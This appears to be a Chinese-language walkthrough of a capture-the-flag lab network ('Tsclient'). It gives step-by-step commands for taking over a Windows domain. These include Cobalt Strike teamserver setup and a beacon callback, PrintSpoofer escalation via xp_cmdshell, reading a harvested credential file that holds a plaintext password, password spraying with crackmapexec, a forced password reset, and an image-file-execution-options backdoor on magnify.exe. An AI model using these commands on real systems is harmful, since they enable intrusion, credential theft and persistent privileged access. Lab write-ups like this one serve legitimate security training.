MDUT只用来上传文件就好了，执行命令这工具是真的逆天

Navicat拿mssql的shell

Navicat连接

用cs连接，服务端用vps，客户端开在kali
vps进入到cs4.0目录执行./teamserver kali地址 20050205
kali进入cs4.0目录打开终端执行java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
用cs建一个监听器，上传到靶机中，也就是artifact.exe
黑客必备利器：如何在系统上安装和使用 CobaltStrike（简称：CS）-CSDN博客
 春秋云镜-Tsclient
上传PrintSpoofer64.exe提权，在Navicat运行它，我们在cs上面就可以接受到会话了
exec master..xp_cmdshell 'C:/Users/Public/PrintSpoofer64.exe -c C:/Users/Public/artifact.exe';

右键选择会话再选择sleep将其改为0，不然执行任务太慢了
shell type C:\Users\Administrator\flag\flag01.txt

用户进程注入，读共享文件

查看在线用户shell quser || qwinst

成功上线用户John
用John查看共享资源 shell net use 发现它通过tsclient挂载了C盘，去列目录发现有一个credential.txt文件，credential.txt 文件通常用于存储Git操作中的登录用户名和密码，用type命令去读取它

拿到一套账密，并提示打映像劫持

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

frp内网穿透

春秋云境Initial详解
 frp 内网穿透多系统多模式（详细+多个应用）_frpc-CSDN博客

喷洒密码，修改密码

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

提示STATUS_PASSWORD_EXPIRED也就是密码过期了，需要使用smbpasswd进行修改密码
proxychains python smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass '1234!@#$qwer'

RDP远程桌面连接

测出来只有172.22.8.46可以连接
proxychains4 rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p '1234!@#$qwer' -r disk:share=/home/kali/Desktop/tmp

映像劫持提权

用放大镜提权
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

开始->锁定